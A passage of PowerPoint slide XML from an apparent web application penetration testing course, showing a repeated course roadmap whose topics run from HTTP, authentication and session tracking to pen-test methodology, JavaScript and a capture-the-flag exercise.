              <a:t>WebSockets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Exercise: Examining HTTP</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    Requests and Responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Exercise: Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Session Tracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Exercise: Analyzing HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SamuraiWTF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Penetration Testing Types and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>   Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Web App Pen Test Components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Reporting and Presenting Findings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Attack Methodology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Types of Flaws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>JavaScript for Pen Testers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Statements, Variables,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Functions, &amp; Events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> The DOM, Methods, and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Properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> AJAX and XMLHttpRequest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> JavaScript Exercise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41"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219075" y="152400"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1981200"/>
            <a:ext cx="8458200" cy="41148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Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>'s View, Pen-</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Testing, &amp; Scoping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 Cont.</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Capture the Flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="5194300" y="152400"/>
            <a:ext cx="520700" cy="6248400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 328"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 328"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 328"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 328 w 328"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="328" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="1445"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="109" y="963"/>
                  <a:pt x="219" y="482"/>
                  <a:pt x="328" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="328" y="3984"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="219" y="3105"/>
                  <a:pt x="109" y="2324"/>
                  <a:pt x="0" y="1445"/>
                </a:cubicBez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
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="152400"/>
            <a:ext cx="3276600" cy="6705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eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Why the Web?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Web App Pen Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Web Site Server Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> The HTTP Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> HTTP Methods</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>HTTP Status Codes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>WebSockets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Exercise: Examining HTTP</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    Requests and Responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Exercise: Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Session Tracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Exercise: Analyzing HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SamuraiWTF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Penetration Testing Types and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>   Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Web App Pen Test Components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Reporting and Presenting Findings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Attack Methodology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Types of Flaws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>JavaScript for Pen Testers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Statements, Variables,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Functions, &amp; Events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> The DOM, Methods, and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Properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> AJAX and XMLHttpRequest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
